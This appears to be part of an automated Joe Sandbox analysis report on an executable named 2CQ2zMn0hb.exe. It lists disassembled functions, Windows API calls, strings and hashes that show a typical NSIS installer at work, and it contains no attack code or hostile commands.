GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

, xrefs: 00405385
N, xrefs: 00405057
M, xrefs: 00404F76

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-614058931
Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

(7B, xrefs: 00403B04
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE4
_Nb, xrefs: 00403C5C, 00403CC4
.DEFAULT\Control Panel\International, xrefs: 00403B44
Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
1033, xrefs: 00403AF8, 00403B54
RichEdit20W, xrefs: 00403D24, 00403D2A
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
RichEdit, xrefs: 00403D33
.exe, xrefs: 00403BE6
RichEd20, xrefs: 00403D06
RichEd32, xrefs: 00403D14

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3853389976
Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\2CQ2zMn0hb.exe,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\2CQ2zMn0hb.exe,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0

Strings

soft, xrefs: 00403020
Inst, xrefs: 00403017
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
C:\Users\user\Desktop\2CQ2zMn0hb.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
Null, xrefs: 00403029
Error launching installer, xrefs: 00402F80
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\2CQ2zMn0hb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3172971329
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

C:\Users\user\AppData\Local\Temp\nsf16D9.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp$C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll$Call
API String ID: 1941528284-2567469237
Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

UXTHEME, xrefs: 0040675B
%s%S.dll, xrefs: 0040679E
\, xrefs: 0040677A

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 6F971777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DB2
Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DB7
Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DBC

GlobalFree.KERNEL32(00000000), ref: 6F971825
FreeLibrary.KERNEL32(?), ref: 6F9718AB
GlobalFree.KERNEL32(00000000), ref: 6F9718D0

Part of subcall function 6F972352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F972383

Part of subcall function 6F972724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9717F6,00000000), ref: 6F9727F4

Part of subcall function 6F9715C6: wsprintfW.USER32 ref: 6F9715F4

Strings

, xrefs: 6F9718B1

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

